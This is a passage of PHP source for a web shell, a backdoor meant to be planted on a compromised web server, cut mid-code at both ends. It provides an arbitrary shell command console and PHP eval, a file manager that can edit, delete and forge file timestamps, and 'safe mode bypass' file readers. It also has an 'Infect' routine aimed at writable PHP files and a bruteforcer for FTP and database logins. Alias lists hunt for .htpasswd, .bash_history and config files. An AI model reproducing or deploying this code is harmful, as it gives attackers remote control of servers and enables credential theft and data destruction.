false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],"w"); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!<br><script>p3_="";</script>'; @touch($_POST['p1'],$time,$time); } } echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</textarea><input type=submit value=">>"></form>'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000<br>','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} $h[1] .= '<br>'; $h[2] .= "\n"; } } echo '<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#1e252e><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#060a10><pre>'.$h[1].'</pre></td><td bgcolor=#1e252e><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br>'; else die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); } echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; break; } echo '</div>'; hardFooter(); } if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function actionConsole() { if(!empty($_POST['p1']) && !empty($_POST['p2'])) { prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif(!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); if(isset($_POST['ajax'])) { prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); echo "d.cf.cmd.value='';\n"; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='".$GLOBALS['cwd']."';"; } } echo "d.cf.output.value+='".$temp."';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); hardHeader(); echo "<script> if(window.Event) window.captureEvents(Event.KEYDOWN); var cmds = new Array(''); var cur = 0; function kp(e) { var n = (window.Event) ? e.which : e.keyCode; if(n == 38) { cur--; if(cur>=0) document.cf.cmd.value = cmds[cur]; else cur++; } else if(n == 40) { cur++; if(cur < cmds.length) document.cf.cmd.value = cmds[cur]; else cur--; } } function add(cmd) { cmds.pop(); cmds.push(cmd); cmds.push(''); cur = cmds.length-1; } </script>"; echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>'; foreach($GLOBALS['aliases'] as $n => $v) { if($v == '') { echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>'; continue; } echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>'; } echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; if(!empty($_POST['p1'])) { echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1'])); } echo '</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; echo '</form></div><script>d.cf.cmd.focus();</script>'; hardFooter(); } function actionPhp() { if( isset($_POST['ajax']) ) { $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true; ob_start(); eval($_POST['p1']); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } hardHeader(); if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { echo '<h1>PHP info</h1><div class=content>'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace('!body {.*}!msiU','',$tmp); $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); $tmp = preg_replace('!h1!msiU','h2',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); echo $tmp; echo '</div><br>'; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false; echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">'; echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>'; if(!empty($_POST['p1'])) { ob_start(); eval($_POST['p1']); echo htmlspecialchars(ob_get_clean()); } echo '</pre></div>'; hardFooter(); } function actionFilesMan() { if (!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']); if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if ( is_array($_FILES['f']['tmp_name']) ) { foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) { if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) { echo "Can't upload file!"; } } } break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($â = readdir($dh) ) !== false) { $â = $path.$â; if ( (basename($â) == "..") || (basename($â) == ".") ) continue; $type = filetype($â); if ($type == "dir") deleteDir($â); else @unlink($â); } closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { if($f == '..') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_COOKIE['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); } elseif($_COOKIE['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); } elseif($_COOKIE['act'] == 'zip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { chdir($_COOKIE['c']); foreach($_COOKIE['f'] as $f) { if($f == '..') continue; if(@is_file($_COOKIE['c'].$f)) $zip->addFile($_COOKIE['c'].$f, $f); elseif(@is_dir($_COOKIE['c'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS['cwd']); $zip->close(); } } } elseif($_COOKIE['act'] == 'unzip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); foreach($_COOKIE['f'] as $f) { if($zip->open($_COOKIE['c'].$f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } } } } elseif($_COOKIE['act'] == 'tar') { chdir($_COOKIE['c']); $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); chdir($GLOBALS['cwd']); } unset($_COOKIE['f']); setcookie('f', '', time() - 3600); break; default: if(!empty($_POST['p1'])) { prototype('act', $_POST['p1']); prototype('f', serialize(@$_POST['f'])); prototype('c', @$_POST['c']); } break; } } hardHeader(); echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo "<script> function sa() { for(i=0;i<d.files.elements.length;i++) if(d.files.elements[i].type == 'checkbox') d.files.elements[i].checked = d.files.elements[0].checked; } </script> <table width='100%' class='main' cellspacing='0' cellpadding='2'> <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function cmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "cmp"); usort($dirs, "cmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; $l = $l?0:1; } echo "<tr><td colspan=7> <input type=hidden name=ne value=''> <input type=hidden name=a value='FilesMan'> <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'> <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; if(class_exists('ZipArchive')) echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>"; echo "<option value='tar'>+ tar.gz</option>"; if(!empty($_COOKIE['act']) && @count($_COOKIE['f'])) echo "<option value='paste'>â³ Paste</option>"; echo "</select> "; if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo "file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'> "; echo "<input type='submit' value='>>'></td></tr></form></table></div>"; hardFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}} if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}} $stringTools = array( 'Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(isset($_POST['ajax'])) { prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); if(in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']); $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); hardHeader(); echo '<h1>String conversions</h1><div class=content>'; echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; foreach($stringTools as $k => $v) echo "<option value='".htmlspecialchars($v)."'>".$k."</option>"; echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>"; if(!empty($_POST['p1'])) { if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2'])); } echo"</pre></div><br><h1>Search files:</h1><div class=content> <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'> <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr> <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr> <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr> <tr><td></td><td><input type='submit' value='>>'></td></tr> </table></form>"; function hardRecursiveGlob($path) { if(substr($path, -1) != '/') $path.='/'; $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $â) { if(@is_dir($â)){ if($path!=$â) hardRecursiveGlob($â); } else { if(empty($_POST['p2']) || @strpos(file_get_contents($â), $_POST['p2'])!==false) echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($â)."\", \"view\",\"\")'>".htmlspecialchars($â)."</a><br>"; } } } } if(@$_POST['p3']) hardRecursiveGlob($_POST['c']); echo "</div><br><h1>Search for hash:</h1><div class=content> <form method='post' target='_blank' name='hf'> <input type='text' name='hash' style='width:200px;'><br> <input type='hidden' name='act' value='find'/> <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br> <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br> <input type='button' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br> <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br> <input type='button' value='tools4noobs.com' onclick=\"document.hf.action='http://www.tools4noobs.com/online_php_functions/';document.hf.submit()\"><br> <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br> <input type='button' value='artlebedev.ru' onclick=\"document.hf.action='https://www.artlebedev.ru/tools/decoder/';document.hf.submit()\"><br> </form></div>"; hardFooter(); } function actionSafeMode() { $temp=''; ob_start(); switch($_POST['p1']) { case 1: $temp=@tempnam($test, 'cx'); if(@copy("compress.zlib://".$_POST['p2'], $temp)){ echo @file_get_contents($temp); unlink($temp); } else echo 'Sorry... Can\'t open file'; break; case 2: $files = glob($_POST['p2'].'*'); if( is_array($files) ) foreach ($files as $filename) echo $filename."\n"; break; case 3: $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include($_POST['p2']); break; case 5: for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) echo join(':',$uid)."\n"; } break; case 6: if(!function_exists('imap_open'))break; $stream = imap_open($_POST['p2'], "", ""); if ($stream == FALSE) break; echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); hardHeader(); echo '<h1>Safe mode bypass</h1><div class=content>'; echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>'; if($temp) echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>'; echo '</div>'; hardFooter(); } function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } function actionSelfRemove() { if($_POST['p1'] == 'yes') if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell has been removed'); else echo 'unlink error!'; if($_POST['p1'] != 'yes') hardHeader(); echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; hardFooter(); } function actionInfect() { hardHeader(); echo '<h1>Infect</h1><div class=content>'; if($_POST['p1'] == 'infect') { $target=$_SERVER['DOCUMENT_ROOT']; function ListFiles($dir) { if($dh = opendir($dir)) { $files = Array(); $inner_files = Array(); while($file = readdir($dh)) { if($file != "." && $file != "..") { if(is_dir($dir . "/" . $file)) { $inner_files = ListFiles($dir . "/" . $file); if(is_array($inner_files)) $files = array_merge($files, $inner_files); } else { array_push($files, $dir . "/" . $file); } } } closedir($dh); return $files; } } foreach (ListFiles($target) as $key=>$file){ $nFile = substr($file, -4, 4); if($nFile == ".php" ){ if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){ echo "$file<br>"; $i++; } } } echo "<font color=red size=14>$i</font>"; }else{ echo "<form method=post><input type=submit value=Infect name=infet></form>"; echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>'; } hardFooter(); } function actionBruteforce() { hardHeader(); if( isset($_POST['proto']) ) { echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>'; if( $_POST['proto'] == 'ftp' ) { function bruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST['proto'] == 'mysql' ) { function bruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST['proto'] == 'pgsql' ) { function bruteForce($ip,$port,$login,$pass) { $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST['server']); if($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>'; } if(@$_POST['reverse']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp); } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++; echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>'; } } } echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>"; } echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">' .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">' .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">' .'<input type=hidden name=ne value="">' .'<span>Server:port</span></td>' .'<td><input type=text name=server value="127.0.0.1"></td></tr>' .'<tr><td><span>Brute type</span></td>' .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' .'<td><input type=text name=login value="root"></td></tr>' .'<tr><td><span>Dictionary</span></td>' .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>' .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; echo '</div><br>'; hardFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = 